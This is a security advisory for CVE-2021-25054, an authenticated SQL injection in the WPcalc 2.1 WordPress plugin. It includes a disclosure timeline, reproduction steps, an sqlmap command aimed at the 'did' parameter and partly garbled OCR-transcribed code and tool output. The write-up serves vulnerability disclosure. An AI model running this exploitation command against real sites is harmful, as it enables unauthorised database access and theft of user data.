CVE-2021-25054 SQL Injection vulnerability in Wpcalc 2.1 Wordpress Plugin

CVE-2021-25054

CVSS 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

 

https://wordpress.org/plugins/wpcalc/

https://wpscan.com/vulnerability/200969eb-e2a4-4200-82d7-0c313de089af

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25054

Disclosure Timeline


Dec 5, 2021: Issue Identified and Disclosed to WPscan
Dec 5, 2021 : Got auto reply
Dec 7, 2021: Got update that vendor had been contacted, CVE Assigned CVE-2021-25054
Dec 9, 2021: Plugin closed permanently
Jan 10, 2022: CVE published in NVD
Jan 14, 2022: CVE updated with score

Description:

The WPcalc Wordpress plugin does not sanitize user input into the 'did' parameter and uses it in a SQL statement, leading to an authenticated SQL Injection

We can see the problematic code in \admin\partials\main.php

 

( $ info 
$deI id 
"del") ( 
"delete from 
"<div class='updated' 
$data . " 
where id=" 
'message ' 
$delid) ; 
("Record Deleted", "wow-fp-lang") . "

 

This vulnerability is present in the current version of the plugin 2.1. Administrative access is required to access the vulnerable functionality.

Link to plugin:

https://wordpress.org/plugins/wpcalc/

Steps to reproduce:

1. Log into WordPress as the admin user

2. Install Wpcalc plugins

3. In the WPcalc plugin settings create and publish a new calc.

WPcalc 
List 
Add new 
Name is used only for admin purposes 
Form 
Field 1 
* Style 
o 
Title': show 
1 
Validation: 
Number 
FAQ 
Item type: 
Innut 
Placeholder: 
1 
pro version 
Field width 
12/12 
Value: 
1 
Plugins 
Publish 
Save 
Shortcode: [WPcalc id=] 
É WP plugins for: 
Marketing 
Forms 
Menu 
Authorization

4. Click the delete link, the capture and save the request in an intercepting proxy.

 

WPcaIc 
List 
Order 
1 
Add new 
Name 
FAQ 
Shortcode 
[WPcalc id=2] 
Pro version 
ID 
2 
Plugins 
Edit 
Delete 
Duplicate

 

5. Save the request to a file, request.txt

6. Run sqlmap

sqlmap -r request.txt -dbms=mysql --current-user -b -p did --batch --flush-session

 

 

disruptions 
you want sqlmap to try to optimize value(s) for DBMS delay responses (option 
(JNFOI to good response times 
' --time-sec• )? [Y/n] Y 
8.ø.16 
web application technology: Nginx 1.16.ø, PHP 7.3.5 
back-end DBMS: MYSQL 5.ø.12 
banner: '8.0.16' 
etching current user 
r ?'0'33Yy3J 
current user: 'rootölocalhost ' 
] [INFO] fetched data logged to text files under 
' /home/kali/. local/share/sqlmap/output/testø. local

Using this technique, we can also (slowly) dump the entire contents of the database, including WordPress users and so on.